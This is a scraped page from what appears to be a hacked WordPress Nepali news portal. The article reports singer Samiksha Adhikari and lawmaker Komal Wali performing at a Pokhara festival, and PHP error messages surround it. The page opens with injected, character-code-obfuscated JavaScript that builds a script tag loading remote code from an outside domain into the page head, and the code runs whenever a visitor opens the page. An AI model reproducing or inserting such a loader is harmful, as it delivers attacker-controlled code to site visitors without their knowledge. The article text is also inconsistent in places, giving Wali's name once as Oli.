Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,101,110,100,46,108,105,110,101,116,111,97,100,115,97,99,116,105,118,101,46,99,111,109,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})(); Warning: session_start(): Cannot start session when headers already sent in /homepages/6/d281313289/htdocs/clickandbuilds/NepaliNewsPortal/wp-content/plugins/unyson/framework/includes/hooks.php on line 259
Warning: Cannot modify header information - headers already sent by (output started at /homepages/6/d281313289/htdocs/clickandbuilds/NepaliNewsPortal/wp-content/plugins/jetpack/sal/class.json-api-date.php:1) in /homepages/6/d281313289/htdocs/clickandbuilds/NepaliNewsPortal/wp-content/plugins/post-views-counter/includes/counter.php on line 294
भाइरल समिक्षा अधिकारीको जादुमय स्वर सुन्न हजारौ दर्शकको भिड (भिडियो सहित) – Nepali News Portal – Trending Nepali News
पछिल्लो समय एकदमै लोकप्रिय गायिका समिक्षा अधिकारी यति बेला पोखराको नवौ महोत्सवमा सहभागी हुन पुगेकी छिन। समिक्षालाइ महोत्सवमा सम्मान र गाउने मौका मिलेको थियो। उक्त महोत्सवमा गायिका तथा राष्ट्रिय सभाका सदस्य कोमल वलीको पनि उपस्थिति थियो। महिला हिँसा हुनुमा आफ्नै दिदि बहिनीहरुको कमजोरी हो, उनीहरुलाई अध्ययनको खाँचो रहेको भन्दै भाषण गर्नुको साथै आफ्नो बेजोड प्रस्तुति पनि उक्त कार्यक्रममा राखिन। ओलीले आफु अहिलेसम्म पनि अविवाहित रहँदा पनि कसैले कु-दृष्टिले नहेरेको बताउदै अध्ययनलाइ थाती राखेर बिहे गर्न हतार हुँदा महिलाहरु हिँसामा परेको बताइन। आफ्नो अध्ययनलाइ प्राथमिकता राख्नु पर्ने र यसले आफुलाइ कसरी सुरक्षित र सक्षम बनाउछ भन्ने पाठ पनि सिकाउछ। वलीले बांझो खेतमा, तुलसी पुरमा लगायतका गीतहरु प्रस्तुत गरेकी थिइनभने प्रजापति पराजुली संग दोहोरी गाउदै बिहेमा भन्दापनि देश बिकासमै अगाडी वढ्ने चाहना रहेको दोहोरी मार्फत बताइन ।
वली संगै मंगलबार महोत्सवमा प्रजापति पराजुली, कुमार पुन, जीवन दाहाल, जय कुमार परियार, शिव हरी ढुंगाना, निशा पोख्रेल र मीना श्रीष मगर लगायतको दोहोरी प्रस्तुती रहेको थियो भने हास्य कलाकार राजा राजारामले प्रहसनमा दर्शकलाई हसाउदै निक्कै मनोरन्जन प्रदान गरेका थिए । त्यसैगरी संस्कृती तर्फ तरेली सांस्कृतिक परिवार र नेवा समाज दुलेगौडा तनहुको नेवारी संस्कृती झल्काउने धीमे र ट्याकटुके नाच प्रत्यक्ष प्रदर्शन गरिएको थियो । मंगलवार सांझ द एक्स ब्याण्ड र लोकल ब्याण्ड प्रोभर्सको प्रस्तुती रहेको महोत्सव सांस्कृतीक संयोजक राजु श्रेष्ठले जानकारी दिए । यतिबेला हामी तपाईलाई समिक्षा अधिकारीको प्रस्तुती प्रस्तुत गर्दैछौँ । हेर्नुहोस यो भिडियो :
Warning: session_start(): Cannot start session when headers already sent in /homepages/6/d281313289/htdocs/clickandbuilds/NepaliNewsPortal/wp-content/plugins/unyson/framework/helpers/class-fw-session.php on line 13
Warning: session_start(): Cannot start session when headers already sent in /homepages/6/d281313289/htdocs/clickandbuilds/NepaliNewsPortal/wp-content/plugins/unyson/framework/helpers/class-fw-session.php on line 13
Warning: session_start(): Cannot start session when headers already sent in /homepages/6/d281313289/htdocs/clickandbuilds/NepaliNewsPortal/wp-content/plugins/unyson/framework/helpers/class-fw-session.php on line 13